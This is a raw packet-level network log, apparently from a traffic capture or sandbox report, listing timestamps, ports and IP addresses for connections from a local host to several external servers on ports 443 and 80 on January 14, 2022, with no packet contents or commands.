Jan 14, 2022 00:16:04.455817938 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.455842018 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.455861092 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.456084967 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.456121922 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.456161976 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.456171989 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.456197023 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.456218958 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.456414938 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.456458092 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.456496000 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.456504107 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.456532955 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.456547022 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.457053900 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.457098961 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.457146883 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.457159042 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.457192898 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.457211018 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.457458019 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.457494974 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.457531929 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.457535982 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.457578897 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.457588911 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.460469961 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.460505962 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.460566998 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.460580111 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.460601091 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.460621119 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.460841894 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.460901976 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523005962 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523044109 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523070097 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523081064 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523231030 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523242950 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523279905 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523293018 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523308039 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523355007 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523401022 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523420095 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523447990 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523477077 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523497105 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523511887 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523519993 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523540020 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523559093 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523571968 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523597002 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523597956 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523643017 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523655891 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523675919 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523684978 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523704052 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523734093 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523761988 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523772955 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523801088 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523827076 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523838997 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523864985 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523881912 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.523910046 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523957968 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.523971081 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.524003983 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.524013042 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.524061918 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.524096966 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.525285006 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.525330067 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.525398016 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.525414944 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.525428057 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.525449991 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.525479078 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.525511980 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.525525093 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.525540113 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.525583029 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.525593996 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.525634050 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.525671005 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.525682926 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.525705099 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.525749922 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.525783062 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.525818110 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.525829077 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.525847912 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.525877953 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.525919914 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.525954008 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526024103 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.526037931 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526051044 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.526068926 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526103973 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526134014 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.526145935 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526158094 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.526199102 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.526217937 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526254892 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526304960 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.526325941 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526341915 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.526384115 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526421070 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526469946 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.526487112 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526505947 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.526550055 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526588917 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526626110 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.526638031 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526665926 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.526715994 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526756048 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526798010 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.526808977 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526819944 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.526850939 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526889086 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526927948 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.526941061 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.526993036 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.550286055 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.550400972 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.550421000 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.550435066 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.550529957 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.551080942 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.551105976 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.551167011 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.551193953 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.551212072 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.551500082 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.551527977 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.551574945 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.551594019 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.551611900 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.551932096 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.552021980 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.552037001 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.552608013 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.552704096 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.552714109 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.552776098 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.552804947 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.552907944 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.552915096 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.552927017 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.552932978 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.552946091 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.552988052 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.552999973 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.553020000 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.553034067 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.553055048 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.553091049 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.553107977 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.553122044 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.553137064 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.553327084 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.553354979 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.553745031 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.553771019 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.554012060 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.554034948 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.554229975 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.554256916 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.554316998 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.554330111 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.554363966 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.554646969 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.554675102 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.554730892 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.554743052 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.554759026 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.555071115 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.555099010 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.555151939 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.555175066 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.555190086 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.555517912 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.555540085 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.555628061 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.555643082 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.580257893 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.580353975 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.580393076 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.580424070 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.580480099 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.581053019 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.581084013 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.581147909 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.581162930 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.581178904 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.581454992 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.581480026 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.581578970 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.581592083 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.581631899 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.581952095 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.581974983 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.582037926 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.582050085 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.582084894 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.582432985 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.582532883 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.582541943 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.582566023 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.582638025 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.582935095 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.583026886 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.583041906 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.583198071 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.583276033 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.583321095 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.583367109 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.583391905 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.583436012 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.583456039 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.583488941 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.583494902 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.583528042 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.583571911 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.583584070 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.583606005 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.583632946 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.583655119 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.583714008 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.583726883 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.583749056 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.583754063 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.583781004 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.583826065 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.668013096 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.837929010 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.837970018 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.837987900 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.838061094 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.838094950 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.838103056 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.838133097 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.838170052 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.838177919 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.838186026 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.838202000 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.838226080 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.838243961 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.841234922 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.841250896 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.841291904 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.841363907 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.841403961 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.841407061 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.841438055 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.841490030 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.841492891 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.841511011 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.841521978 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.841561079 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.841561079 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.841589928 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.841625929 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:05.178839922 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:05.186547041 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:05.268299103 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:05.268341064 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:05.268366098 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:05.268379927 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:06.356214046 CET	49895	80	192.168.2.4	185.163.45.70
Jan 14, 2022 00:16:06.495369911 CET	49897	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.545957088 CET	80	49897	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.546108961 CET	49897	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.546185017 CET	49897	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.546267033 CET	49897	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.596647978 CET	80	49897	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.623361111 CET	80	49897	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.623466969 CET	49897	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.623662949 CET	49897	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.655952930 CET	49898	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.673986912 CET	80	49897	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.706198931 CET	80	49898	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.706377983 CET	49898	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.706459045 CET	49898	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.706634045 CET	49898	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.756639004 CET	80	49898	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.783859015 CET	80	49898	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.783951998 CET	80	49898	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.784038067 CET	49898	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.784276962 CET	49898	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.823071957 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.834978104 CET	80	49898	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.874027014 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.875181913 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.875278950 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.935619116 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.935681105 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.935734034 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.935791969 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.935810089 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.935842991 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.935858965 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.935898066 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.936028957 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.936079979 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.936098099 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.936132908 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.936197042 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.936455011 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.936521053 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.986509085 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.986572027 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.986623049 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.986675024 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.986675978 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.986728907 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.986746073 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.986783981 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.986835003 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.986857891 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.986887932 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.986938953 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.986953974 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.986993074 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.987042904 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.987056971 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:06.987095118 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:06.987145901 CET	80	49899	93.189.42.167	192.168.2.4
